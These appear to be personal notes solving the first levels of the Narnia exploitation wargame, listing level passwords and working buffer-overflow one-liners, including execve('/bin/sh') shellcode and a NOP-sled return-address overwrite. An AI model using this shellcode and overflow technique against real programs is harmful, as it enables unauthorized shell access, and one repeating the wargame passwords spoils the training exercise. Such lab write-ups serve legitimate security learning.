PORT 2226

NARNIA 0 : narnia0
(echo -e "....................\xef\xbe\xad\xde";cat;) | ./narnia0
if we dont add cat, the program will immediatly terminate.
cat keeps it open idk why

NARNIA 1 : efeidiedae
export EGG=$'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

http://shell-storm.org/shellcode/files/shellcode-752.php
The shell code corresponds to execve("/bin/sh")

execve causes /bin/sh to overlay the current running program (before it can segfault).

NARNIA 2 : nairiepecu 
/narnia/narnia2 $(python -c 'print("\x90"*91 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x90"*20 + "\xa8\xd5\xff\xff")')
